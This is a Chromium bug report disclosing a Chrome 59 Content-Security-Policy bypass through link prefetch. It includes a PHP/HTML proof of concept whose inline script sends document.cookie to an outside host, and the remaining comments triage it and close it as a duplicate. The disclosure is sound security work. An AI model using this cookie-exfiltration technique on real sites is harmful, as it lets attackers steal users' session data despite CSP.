Issue 719242

Issue metadata

Status: Duplicate
Merged: issue 663620
Owner:
Buried. Ping if important.
Closed: Jun 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: Mac
Pri: 2
Type: Bug



Bypass of CSP unsafe-inline mode in Blink.

Reported by evi1m0.bat@gmail.com, May 7 2017

Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.36 Safari/537.36

Steps to reproduce the problem:
We can see intercept requests and bypass requests.

PoC: http://server.n0tr00t.com/chrome/csp31.php

[evi1m0@iZj6c8vaac87t4nyobq3r9Z chrome]# cat csp31.php
<html>
<head>
    <meta charset="utf8">
    <title>Chrome59 CSP unsafe-inline bypass</title>
    <?php
    header("Content-Security-Policy: default-src none 'unsafe-inline'; report-uri /test-csp-reports");
    ?>
    <style>
    textarea {
        margin: 0px;
        width: 414px;
        height: 185px;
    }
    </style>
</head>
<body>
<h3>documentcookie --> evil.com</h3>
<a href="https://ws1.sinaimg.cn/large/c334041bgy1ffd69uur7ij20ub08oq5a.jpg" target="_blank">
https://ws1.sinaimg.cn/large/c334041bgy1ffd69uur7ij20ub08oq5a.jpg
</a>
<hr>
<textarea>
Web source:

    header("Content-Security-Policy: default-src none 'unsafe-inline'; report-uri /test-csp-reports");

    <link rel="preload" href="//linux.im/styles/other.css">

    <script>
        n0t = document.body.appendChild(document.createElement("link"));
        n0t.setAttribute("rel", "prefetch");
        n0t.setAttribute("href", "//1J38ax.chrome59.test.n0tr00t.com/?" + document.cookie);
    </script>
</textarea>

<!-- testcode -->
<link rel="preload" href="//linux.im/styles/other.css">
<script>
    document.cookie = "csp=" + escape("SECUREKEY@^#(!@#(&*(@#!") + ";";
    n0t = document.body.appendChild(document.createElement("link"));
    n0t.setAttribute("rel", "prefetch");
    n0t.setAttribute("href", "//1J38ax.chrome59.test.n0tr00t.com/?" + document.cookie);
</script>
<!-- testend -->
</body>
</html>

What is the expected behavior?

What went wrong?
Bypass CSP

Did this work before? N/A

Chrome version: 59.0.3071.36 Channel: beta
OS Version: OS X 10.12.4
Flash Version: Shockwave Flash 25.0 r0
 

Comment 1 by tkent@chromium.org, May 7 2017

Components: -Blink Blink>SecurityFeature
Labels: Needs-Triage-M59

Comment 3 by mkwst@chromium.org, Jun 19 2017

Components: -Blink>SecurityFeature Blink>SecurityFeature>ContentSecurityPolicy
Mergedinto: 663620
Owner: mkwst@chromium.org
Status: Duplicate (was: Unconfirmed)
Duping this against https://bugs.chromium.org/p/chromium/issues/detail?id=663620#c2. If you have opinions about whether or not CSP ought to control `prefetch` requests, I'd suggest hopping over to https://github.com/w3c/webappsec-csp/issues/107 to comment.
